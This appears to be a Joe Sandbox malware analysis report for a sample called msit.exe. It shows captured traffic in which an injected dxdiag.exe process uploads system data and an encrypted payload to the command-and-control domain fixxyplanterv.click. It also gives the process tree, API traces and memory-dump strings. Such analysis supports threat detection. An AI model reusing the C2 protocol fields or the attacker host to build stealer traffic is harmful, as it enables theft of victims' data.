{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HquP4F0Y0oce6e58sbkGmewkhxbsO5T%2Fyj37%2FiHvLAxboeBErVqAzWWx0bNNAZ%2Ff9TY0wG0vdPToxL67zkWo5GJYfK4eL%2Fdn7XoNprS%2Fl%2FtL9%2FmqvbXa%2BBLEQgJN4LxEe4nomkGj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4b2cd300ca8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1496&rtt_var=593&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2135&delivery_rate=1951871&cwnd=159&unsent_bytes=0&cid=7168fdce4a9e3a01&ts=443&x=0"
2025-01-13 07:34:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:48 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SWU054U4I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 586097 Host: fixxyplanterv.click
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --SWU054U4IContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--SWU054U4IContent-Disposition: form-data; name="pid"1--SWU054U4IContent-Disposition: form-data; name="lid"ZqchOa--new--SWU054U4IContent-Dispos
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: f0 c9 1e 2a 7c ef 31 61 fa cb f7 eb df 1a 18 a0 3c 5b d3 65 75 db 49 84 4d 1e d0 13 9d fd 39 d4 62 87 c0 b3 eb b2 cd e6 c6 b2 66 44 20 ba 0c 2c 2e b3 da 5f 68 b0 15 c1 c6 22 8a 25 fb 2f e8 80 91 5e 73 83 35 67 59 87 4c 7d 0f 14 eb 6b bb cc 25 c0 30 d9 07 36 06 7e 31 46 4f a2 f8 69 be fe 88 8b 9a a9 44 49 e8 fb 8e b9 09 8f d6 44 cd bd fa df ca cc 93 44 60 ca 13 42 e6 37 4b 06 f3 e3 b6 28 c8 eb 03 ea 50 ab f2 8c a6 05 82 a2 f8 eb 9a 47 95 58 8e 8b a3 4d 5e 84 5e 26 6b 1b 56 58 12 a8 44 84 7d 02 19 be 6b 7d 25 d7 00 63 a0 3a 41 f2 30 ac ad f1 2d 4a 9e 55 8b 22 1c 5e 70 94 47 5f 7c e7 d8 2a db 9b 33 83 9e a5 c5 41 e3 1f c8 0c ee af 05 c6 7e 66 db f7 04 c3 51 42 a7 5b 31 f4 55 38 c7 d3 5e 10 f8 8e a5 3b b8 9d 54 3f 79 82 cd ff da c7 0c 3e da ed 49 9d 59 61 89 Data Ascii: \|1a<[euIM9bfD ,._h"%/^s5gYL}k%06~1FOiDIDD`B7K(PGXM^^&kVXD}k}%c:A0-JU"^pG_\|3A~fQB[1U8^;T?y>IYa
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: 62 36 ab 3e 41 83 5e 67 58 c1 ef dc b4 62 60 ae a9 27 5c 25 db 7e 3b 3b f6 e3 eb 21 d1 59 37 0c d0 d1 eb 18 12 4c 1f 0d 53 04 e4 f1 0d 68 0a e2 43 1b 23 4f e7 13 e2 a9 be b8 ef 8a 99 e4 4b 21 5d 10 62 96 10 3c 00 64 ba 3f 6c 66 7f d8 1e 19 4e 04 e5 79 c0 c2 b9 5a 83 26 ed bd dc d7 9c 1f 15 44 94 78 e3 dc d1 26 54 7c d3 b0 74 ab f1 2f 7d 99 f1 ab e7 b5 91 59 aa 58 fd 3a f7 fc 4e 35 f4 7f 34 fb be 7b 35 6f 09 05 48 22 b7 c8 df 88 16 bc 61 d1 2e 11 42 52 3c e4 70 4a 26 47 13 78 d4 46 23 02 5c bb bf f5 35 e7 23 85 42 49 1d 7a b7 8b ac e1 ea 2a 78 e2 b2 c6 08 80 6a 98 2e b3 8d 96 66 2e ce 95 44 bc c7 c9 5b 36 03 3d 52 b7 ad ad 73 e6 de 62 77 60 e9 49 92 b0 85 1c 5a a4 27 14 69 b3 91 4c 68 e6 ea 77 7d da a3 70 12 71 4c a4 36 77 e6 98 11 19 69 31 94 e9 f5 a2 3c Data Ascii: b6>A^gXb`'\%~;;!Y7LShC#OK!]b<d?lfNyZ&Dx&T\|t/}YX:N54{5oH"a.BR<pJ&GxF#\5#BIz*xj.f.D[6=Rsbw`IZ'iLhw}pqL6wi1<
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: af 35 5e 92 ff 79 39 2f 93 c4 b7 05 b7 57 96 0c 1b 83 f7 8a 32 17 87 2e fa ce 3f 81 78 7f 52 4d b0 93 f4 d2 a0 d6 08 38 7e 16 03 70 b2 a1 8c fc 53 59 4a b8 63 23 d5 6e 8d 4c 11 01 c6 b8 30 dd b6 f9 5f d3 13 f9 f5 c8 94 b7 ef 0c 7a b8 22 e3 1a 6c bc 13 75 79 96 f6 fd 7f b7 18 09 80 12 81 3f b7 0b 68 81 1e 61 76 bc 29 5d c3 10 cc fa 9f 21 66 03 4d d4 8e c5 6e e0 25 c6 f5 de 0f 73 42 01 f7 9b bf 2c 7e b8 0a 70 ae df 2d ca cf 31 87 98 f4 b0 c4 09 d0 16 51 7d 15 d0 5a 76 ec 4b a9 e1 26 2a d1 11 e2 82 d3 5a 73 06 e0 10 30 55 46 ed 5c 26 d8 ca 45 20 0f 15 3d 96 8a 08 78 8d 7b f4 02 0b a3 2b ab b6 e0 14 c6 91 25 30 d0 f9 db 12 e4 64 8a 58 06 f0 fd fd 1d 64 e6 4f cd f2 42 0f 6f 31 c9 84 1a db 79 14 2f 37 3d 0c 08 30 bc 4b b7 6c 44 fc ad 14 cb 66 09 15 f8 70 08 c1 Data Ascii: 5^y9/W2.?xRM8~pSYJc#nL0_z"luy?hav)]!fMn%sB,~p-1Q}ZvK&*Zs0UF\&E =x{+%0dXdOBo1y/7=0KlDfp
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: b0 73 47 c4 4f d9 5a 39 58 29 eb 6d 3e b6 f9 c7 89 dc 07 72 93 34 0a 96 ec fb 23 f8 d0 52 2a 07 34 cf a1 33 d5 b6 33 67 78 02 73 fa 14 c1 75 fd 91 96 21 36 49 b8 4d 58 94 18 07 6c 46 ab 4b 10 c7 1d 29 90 a8 14 eb 3c 4f ac e8 71 70 ad 10 82 6d a7 6c 45 6b 7a 46 4e 32 80 49 ad 7d 36 a0 4e 71 ac 89 cc bf 15 86 f7 37 f3 f4 86 ba c9 fd c5 44 3f ce 39 7f 4c df 38 31 61 68 5a d5 a4 42 fe d6 70 f4 40 50 56 e3 2f db 20 8c a2 7c 4d 16 72 af 3f 2c e6 52 64 71 42 e9 d3 f2 35 cc 66 47 2f 29 35 d4 5c d4 35 00 d5 57 4a e3 5e 90 5e 2a 16 36 82 19 22 29 3a 57 3d 05 8e 63 76 8a 10 51 c2 66 de 92 ad 9e 7c 5d a1 87 57 0b d7 26 1c bb b3 12 76 79 a6 d9 93 36 44 39 bd 1e 1a e1 8a fd 91 8a e5 c8 0f 24 99 68 34 a0 59 03 87 67 85 9f 6c 9b 4c 80 2a 67 e7 12 32 2e 3d e2 f8 d3 a8 b1 Data Ascii: sGOZ9X)m>r4#R433gxsu!6IMXlFK)<OqpmlEkzFN2I}6Nq7D?9L81ahZBp@PV/ \|Mr?,RdqB5fG/)5\5WJ^^6"):W=cvQf\|]W&vy6D9$h4YglL*g2.=
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: ea e5 b0 ba fa cf a9 d7 e8 a0 e1 a7 7b 17 43 09 fb 06 8a 9c cc 0b 17 92 bf 64 b0 4f 49 9b f3 ce bf 92 56 2c 59 2a 9d a4 ff 39 88 61 4d 70 35 f5 96 e7 2c 6e 82 d7 d3 d5 13 c3 7a 07 00 9d c3 1b 3a 45 57 24 d2 d3 b9 2b 0b fe 46 22 8b a5 79 1b c3 2a 02 4b 9f bd b7 66 59 95 77 e4 13 f6 88 81 26 a9 08 35 5f 6a 08 d8 22 92 49 34 12 4c 96 64 cc 78 8b cb d8 be b8 71 ad 66 d7 81 ea 3b a7 8e e1 d5 53 f4 6d 00 7d e4 a6 e2 b4 18 08 e5 32 87 5b 3a dd bf 70 f3 df 5e 82 bf 96 06 31 7b 6e 27 a1 69 77 c9 db fd fe f6 e0 f3 09 d8 1d db 67 8d 71 6e 92 52 a8 f5 23 d5 55 4a 80 e6 77 ca 14 81 c4 52 18 a9 af d8 15 7a ea bc bf 00 08 e2 43 31 21 50 71 17 50 be 10 3d 27 b3 bf 4d 4b 01 a9 af 60 66 1f eb 47 04 fc 31 a6 00 c3 07 65 ef 92 43 58 44 b8 91 c8 e4 f5 21 87 bd cb af 78 85 af Data Ascii: {CdOIV,Y9aMp5,nz:EW$+F"yKfYw&5_j"I4Ldxqf;Sm}2[:p^1{n'iwgqnR#UJwRzC1!PqP='MK`fG1eCXD!x
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: 23 de 60 94 f2 dd 54 c4 50 c2 70 83 16 d1 86 ae e2 f8 ae 66 3b 70 f6 6f 7d a3 72 2c 9c 50 2c 33 5e e0 97 79 c5 06 80 21 e5 6f 84 69 4e d9 91 a1 57 6d 62 9e 9f c0 62 af 73 aa e1 1d 88 c8 91 bd 20 13 a3 0a 13 ba 00 0a 82 f8 80 fe 03 60 63 39 ff e4 76 0e 44 99 34 a4 7d b9 03 0d 45 a2 61 dd fd b1 c0 94 54 ba 72 96 17 30 1a e8 f1 72 47 c0 46 f2 4c c6 f4 23 f6 d7 bb 9e 9a d8 48 1f dc 7e 3c 06 a3 60 df 93 10 94 c2 4d e9 af 95 2d 47 7f f5 68 22 bf 3f c1 6a f9 59 11 74 fe 0f 9a 76 71 8c 86 a4 d0 e4 c7 47 40 8f 06 51 e7 22 c8 17 c4 20 66 dd 06 06 e6 df be 80 ad 0f 85 21 ff 9a 93 ae b1 eb 36 2a ec 1d e6 0d 52 7e 34 83 0e 9c 67 2d b6 47 17 08 ea 82 7d ea d0 39 fc 09 73 c2 0d 3b 58 8e 5b a4 05 a2 51 bb 08 37 40 be db b8 83 0b 4f 9a 2f 8f d8 7a d4 40 04 7c 4f 8f 61 71 Data Ascii: #`TPpf;po}r,P,3^y!oiNWmbbs `c9vD4}EaTr0rGFL#H~<`M-Gh"?jYtvqG@Q" f!6*R~4g-G}9s;X[Q7@O/z@\|Oaq
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: e7 f4 d6 9a 2a 3f 90 c0 80 b6 a7 8a 8b ea bc 95 a0 5b 15 f5 8f 41 e9 75 b0 b5 a8 20 7f 4f fb 64 9e 49 95 04 a6 f0 9c 63 38 49 55 0f 03 6d 11 51 fa 7a 68 59 a1 dd 59 b1 77 aa 2c 3b 0e ca 5c 0d 92 9a 9e 3a 6d 5c 43 42 b0 94 cb 41 45 58 0d 9d 2e 9f 40 4e 00 09 c2 64 5a f9 6c 6b d0 a9 9f 55 07 77 28 d0 15 e7 c5 51 b7 cf c5 a0 48 fc 5a a8 4b 12 35 13 56 de 68 eb 64 40 74 24 20 b8 9b a1 a3 81 ef 8e 84 8b c9 6f 52 9e b3 33 77 29 4f 0b 62 58 e8 45 ab c6 4c 4d e4 07 4d 48 f1 1c 7d 84 5b c1 2d e3 36 67 95 2a a2 5d a3 ee 7f ab 08 da 81 79 23 d0 d6 f0 b8 76 96 04 1b a9 73 89 b8 eb 6e 32 77 8c c2 f5 cd 42 a1 55 62 ce 27 4c 64 4d 8a 23 ef ac e7 05 9c 2d 82 2b 87 f4 29 7d 11 81 54 1d 1d 7e af 9f de 71 22 99 80 38 6c 6a 2b ad 52 86 9a 91 e8 f0 3a 4b 1c 0c 79 04 98 af e3 Data Ascii: ?[Au OdIc8IUmQzhYYw,;\:m\CBAEX.@NdZlkUw(QHZK5Vhd@t$ oR3w)ObXELMMH}[-6g]y#vsn2wBUb'LdM#-+)}T~q"8lj+R:Ky
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: c1 4a 11 d9 0f 16 df 31 6c b3 7e 75 d6 18 84 55 65 8d 39 f0 4b 7d 68 6a fb 02 90 94 20 83 d2 06 e4 52 c5 e6 05 23 31 c9 82 4d b5 f1 56 39 67 bb b2 3d ad 77 3c c7 e9 cb 50 c6 cf 53 87 aa 6d c6 fe c2 f8 71 e3 eb 1a ef f8 4c b0 de 62 ae c6 de 99 5f 59 a0 51 d0 f3 f7 d9 4f 7b 5f de ac 44 2f 38 f4 6d be ee d7 73 3d f8 dc e0 f6 bf 77 2e c9 a5 0d 1e e2 ee 21 6e fd 5b a4 0a fd 31 81 37 45 98 fa 20 59 97 40 b6 3c 87 7c 11 e4 69 3b bc 64 f9 1c 61 5d 11 74 d3 7e 89 a8 c7 47 b9 b1 12 b1 92 e0 a2 be 13 cd 4e 9c f9 7a a4 b5 94 73 9e e5 2d 3c 38 75 da 40 82 ac d2 97 dc 29 59 95 a2 f9 d4 55 a5 9a 21 e1 cb 0c 53 f9 1a 18 9c 3d 1f 80 c3 76 36 8c d1 e6 04 04 a8 6a 45 78 99 34 e7 50 87 91 c5 c2 bf 7e 5d 97 fc ef 10 bd e2 c3 64 62 ac 59 0a 63 d0 da 80 69 0c 18 0b 86 0c 9f e7 Data Ascii: J1l~uUe9K}hj R#1MV9g=w<PSmqLb_YQO{_D/8ms=w.!n[17E Y@<\|i;da]t~GNzs-<8u@)YU!S=v6jEx4P~]dbYci
2025-01-13 07:34:48 UTC	15331	OUT	Data Raw: 47 7c 20 b9 fd 02 27 87 b3 f5 49 e3 9f 8e 23 c9 76 5f fe cd fe 94 76 f5 79 33 4a d6 f7 7e e3 d1 f3 fc 6b 36 9f 3c fa de 2a d8 b9 2c bc 70 b3 9c 3a d7 fd 4a b3 e7 d6 a4 4d b8 0e ba 2e eb 15 21 cc 30 d0 35 c3 74 b7 62 61 89 4c e0 05 df fc 7c e5 59 1d 47 53 86 87 61 c3 7f 49 ee af 34 8a 73 8e 4a 3d 84 e7 b3 3a 5e ab 8a 94 6c cc a0 78 5a f6 5f c7 4b 7c a8 99 c3 91 92 36 95 3a 00 df b9 a3 a2 23 ff 59 45 28 22 1e bd a4 51 9e 3f fe a4 08 47 e3 90 fd 94 06 b3 45 01 50 22 dd 63 97 1c 56 5c ba b1 a6 64 fb e5 80 4b 92 3e d6 c2 ad 1d ad f4 0f 7e 56 8b 5d 97 f8 d0 16 93 02 5b b2 e6 ec d5 03 23 1d 8c 2f fd be 7a 73 4f 4e fd aa 5a 59 4c 6a 5f 0c 12 5e 60 2e 64 ee 31 cf 93 50 ac b4 14 a1 55 58 89 f3 ce ea 8e cc 7d 7d 23 ed 5c 68 b5 d5 2c 59 be 9c dc e9 63 a6 f3 ab c5 6f Data Ascii: G\| 'I#v_vy3J~k6<*,p:JM.!05tbaL\|YGSaI4sJ=:^lxZ_K\|6:#YE("Q?GEP"cV\dK>~V][#/zsONZYLj_^`.d1PUX}}#\h,Yco
2025-01-13 07:34:50 UTC	1141	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3ajl4pl4nlom0s1bo48ncun5ej; expires=Fri, 09 May 2025 01:21:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUrCq4%2FWtPHo3OIpre7%2BTb2tTpzW6GCcsAgdO%2Basx7poQnqjv%2Bfp5nG6x9%2FEQ%2BDUxjDjnOSxXVdcPr0rAYitnCmntv7jAuraVXiKJqzaqc%2FU4CjAjoaFzdlggo111Y6DB2X0lZMH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4bb7e78430d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2461&rtt_var=931&sent=206&recv=604&lost=0&retrans=0&sent_bytes=2848&recv_bytes=588682&delivery_rate=1169871&cwnd=230&unsent_bytes=0&cid=5f5d69f9dc390cd1&ts=1579&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49719	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:50 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: fixxyplanterv.click
2025-01-13 07:34:50 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=FD089AA551ECCED45EC6468C5C963249
2025-01-13 07:34:51 UTC	1119	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hajq77m5kie11rlman4pg7brqm; expires=Fri, 09 May 2025 01:21:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tA9gVXEjFVYDUTbYmPJOylowzCodB84QLBcrS8PHSSAlITAUQuEOAirZnJFYWeVgUu7rFZbJydUShnEtIcBJ3Ke7d571SHF7AGucDfFdrncjReXWGHEhUoTr10oJTikyzlgFSY1z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4c8d93d199d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1813&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=983&delivery_rate=1576673&cwnd=223&unsent_bytes=0&cid=7bf7ac7f8af054b7&ts=516&x=0"
2025-01-13 07:34:51 UTC	54	IN	Data Raw: 33 30 0d 0a 4c 78 76 52 2b 43 65 77 5a 64 67 56 45 53 38 79 30 57 2b 59 7a 62 39 31 77 7a 48 63 49 31 4b 44 65 41 4b 58 4b 53 43 66 4d 66 56 30 52 67 3d 3d 0d 0a Data Ascii: 30LxvR+CewZdgVES8y0W+Yzb91wzHcI1KDeAKXKSCfMfV0Rg==
2025-01-13 07:34:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:34:30
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\msit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\msit.exe"
Imagebase:	0x750000
File size:	20'182'372 bytes
MD5 hash:	BB0CA87D28E7C1BFD53E3E592E75E684
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:34:33
Start date:	13/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7b8650000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:34:33
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C
Imagebase:	0x640000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:34:34
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 "
Imagebase:	0x640000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:34:36
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E
Imagebase:	0x640000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:34:37
Start date:	13/01/2025
Path:	C:\Windows\Installer\MSIA455.tmp
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Installer\MSIA455.tmp"
Imagebase:	0x7ff68e4b0000
File size:	13'084'160 bytes
MD5 hash:	4D82074854750FDBA89D76624CC1E6F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:34:38
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0x280000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FF68E585D6C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68E585D98
GetCurrentThreadId.KERNEL32 ref: 00007FF68E585DA6
GetCurrentProcessId.KERNEL32 ref: 00007FF68E585DB2
QueryPerformanceCounter.KERNEL32 ref: 00007FF68E585DC2

Memory Dump Source

Source File: 00000006.00000002.1590444702.00007FF68E4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68E4B0000, based on PE: true

Associated: 00000006.00000002.1590423797.00007FF68E4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.1590547518.00007FF68E59D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.1591492297.00007FF68EF9C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.1591595541.00007FF68F0DC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.1591618402.00007FF68F0E1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.1591641127.00007FF68F0E7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff68e4b0000_MSIA455.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
Instruction ID: 1be677b68d996cd8c821f8bc89af41961fe1d6fa25f1dc2d10906a475e0dae51
Opcode Fuzzy Hash: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
Instruction Fuzzy Hash: 9F111C32B55B05CAEB009FA0E8542A833A4FB59758F440A35EE6D877A4DF78D155C340

Analysis Process: dxdiag.exePID: 1984, Parent PID: 6188COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70.1%
Total number of Nodes:	288
Total number of Limit Nodes:	24

Executed Functions

Function 00435870 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 661
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435B0F
SysAllocString.OLEAUT32(0000D588), ref: 00435B91
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BCF
SysAllocString.OLEAUT32(s%w'), ref: 00435C56
SysAllocString.OLEAUT32(s%w'), ref: 00435CF1
VariantInit.OLEAUT32(83828188), ref: 00435D64

Strings

PQ, xrefs: 00435D9E
d)*+, xrefs: 00435BE8
/#$%, xrefs: 00435919, 004359B5
s%w', xrefs: 00435C51, 00435C55, 00435CF0, 00435DCF

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: /#$%$PQ$d)*+$s%w'
API String ID: 65563702-3008678497
Opcode ID: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
Instruction ID: 5414f25a513856cf292a94d973b8fe981ab4f01926d2cca0fa1231f3848f9231
Opcode Fuzzy Hash: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
Instruction Fuzzy Hash: 50220E71A087009BD710DF29C881B6BBBE5EFC9710F14892EF4959B391D738D90ACB86

Function 0040E458 Relevance: 14.2, APIs: 2, Strings: 7, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040E45F
CoUninitialize.COMBASE ref: 0040E7DC

Strings

[^Q$, xrefs: 0040E8CF
2t, xrefs: 0040EA7D
vol,, xrefs: 0040E8C1
yp, xrefs: 0040EA76
Qv, xrefs: 0040EA6F
qy, xrefs: 0040EA84
fixxyplanterv.click, xrefs: 0040E7C5, 0040EB48

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: Uninitialize
String ID: 2t$Qv$[^Q$$fixxyplanterv.click$qy$vol,$yp
API String ID: 3861434553-2046213541
Opcode ID: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
Instruction ID: 4db51f1f72c5905ee0b1b22d732d3a9d787199a41c6fab9545acfa54408a17bb
Opcode Fuzzy Hash: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
Instruction Fuzzy Hash: E9120CB56047818FD325CF36C590622BFA2FF96304B1989ADC4D25FB92C739B816CB94

